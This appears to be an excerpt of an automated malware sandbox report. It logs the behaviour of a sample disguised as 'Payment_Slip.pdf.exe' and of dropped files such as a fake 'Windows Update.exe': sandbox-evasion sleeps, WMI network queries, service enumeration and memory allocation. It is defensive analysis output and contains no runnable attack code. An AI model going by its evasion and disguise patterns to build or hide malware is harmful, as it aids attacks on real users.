Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040E18D Sleep,ExitProcess, 11_2_0040E18D
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040E18D Sleep,ExitProcess, 17_2_0040E18D
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: A30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 23A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 43A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 8410000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 9410000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 9620000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: A620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 2EF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 3100000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 5100000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 8D80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 74E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 9D80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: AD80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\host.exe Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\host.exe Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\host.exe Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Memory allocated: 2DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Memory allocated: 2FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Memory allocated: 4FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 1820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 31D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 51D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: B70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 2510000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 4510000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: F00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 29B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 49B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 1590000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 2F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 4F30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 11_2_004186FE
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 17_2_004186FE
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199655
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199437
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599644
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599441
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599263
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599155
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598710
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598043
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597718
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597168
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597051
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199758
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199631
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199380
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599869
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598669
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598012
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597397
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596952
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595421
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595202
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595041
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594935
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594820
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199672
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199530
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598662
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597029
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596703
